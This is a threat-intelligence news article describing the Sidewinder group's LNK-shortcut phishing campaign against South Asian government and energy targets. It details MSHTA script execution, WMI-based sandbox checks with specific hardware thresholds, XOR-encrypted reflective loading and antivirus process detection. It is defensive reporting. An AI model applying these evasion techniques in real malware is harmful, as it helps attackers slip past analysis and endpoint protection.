The notorious APT-C-24 threat actor group, commonly known as Sidewinder or Rattlesnake, has evolved its attack methodology by deploying sophisticated LNK file-based phishing campaigns targeting government, energy, military, and mining sectors across South Asia.
Active since 2012, this advanced persistent threat organization has shifted away from its traditional exploitation of Microsoft Office vulnerabilities, instead embracing a more stealthy approach using weaponized shortcut files to execute remote malicious scripts.
Recent attack samples discovered by security researchers reveal a carefully orchestrated campaign where victims receive compressed archives containing three malicious LNK files, each designed with dual extensions such as “file 1.docx.lnk,” “file 2.docx.lnk,” and “file 3.docx.lnk.”
These deceptive filenames are strategically crafted to appear as legitimate document files, exploiting user trust and increasing the likelihood of execution.
The attackers have refined their delivery mechanism to maximize infection probability by providing multiple entry points within a single package.
Ctfiot analysts identified that these LNK files leverage the Microsoft HTML Application Host (MSHTA) program to execute malicious scripts hosted on remote command-and-control servers.
The remote URLs exhibit a distinctive pattern, terminating with parameters “yui=0,” “yui=1,” and “yui=2,” serving as unique identifiers for each variant while maintaining functional similarity across all three files.
.webp "Sidewinder Hacker Group Weaponizing LNK File to Execute Malicious Scripts 3")
The attack methodology demonstrates sophisticated environmental awareness capabilities, with the malicious scripts performing comprehensive system reconnaissance before proceeding with payload deployment.
Upon execution, the initial JavaScript component conducts anti-analysis checks by querying system specifications through Windows Management Instrumentation (WMI), specifically examining processor core counts and physical memory allocation to distinguish between genuine target environments and security research sandboxes.
Advanced Evasion and Payload Deployment Mechanisms
The group’s technical sophistication becomes evident in their multi-layered obfuscation techniques and conditional payload delivery system.
The initial HTML application performs dual functionality by simultaneously deploying decoy content to maintain victim deception while establishing persistence through memory-resident attack components.
The malicious script queries processor cores using “SELECT NumberOfCores FROM Win32_Processor” and requires a minimum of two cores alongside 810MB of physical memory before proceeding with payload decryption.
Once environmental checks pass validation, the script employs Base64 decoding combined with XOR encryption to decrypt and reflectively load a heavily obfuscated C# downloader component.
This sophisticated payload performs security software detection, scanning for processes associated with Kaspersky, ESET, and other endpoint protection solutions before establishing communication with command-and-control infrastructure.
The attackers demonstrate operational security awareness by rapidly rotating compromised domains and selectively delivering advanced payloads only to victims meeting specific targeting criteria, significantly complicating security research efforts and threat hunting activities.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
